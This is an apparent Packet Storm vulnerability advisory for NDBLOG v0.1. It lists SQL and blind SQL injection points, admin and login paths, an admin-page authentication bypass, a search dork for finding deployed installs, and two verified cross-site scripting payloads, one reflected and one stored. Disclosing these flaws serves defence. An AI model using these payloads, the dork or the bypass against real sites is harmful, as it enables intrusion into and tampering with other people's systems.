NDBLOG version 0.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
dd65952f3824e00cc2a80344ad64d4d621e1ec5e3aa4745efa0abfdc2cc09023NDBLOG version 0.1 multi Vulnerability
======================================
Author : indoushka
Vondor : ALAMARAB2.com
Dork : جميع الحقوق محفوظة © - ALAMARAB2.com - NDBLOG v_0.1
==================================================
Sql injection :
http://localhost/ND/blog.php?id=85 (inject her)
Blind SQL Injection :
http://localhost/ND/blog.php?action=delete&id=11 (inject her)
Panel = localhost/ND/admin/
Login = http://localhost/ND/login.php
Cross site scripting (verified) :
URL encoded POST input user was set to 1'"()&%<ScRiPt >prompt(999862)</ScRiPt>
Cross site scripting [stored] (verified) :
URL encoded POST input img was set to 1" onmouseover=prompt(976473) bad="
The input is reflected in http://localhost/ND/
The input is reflected inside a tag parameter between double quotes.
by Pass :
http://localhost/ND/admin/menu.php
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed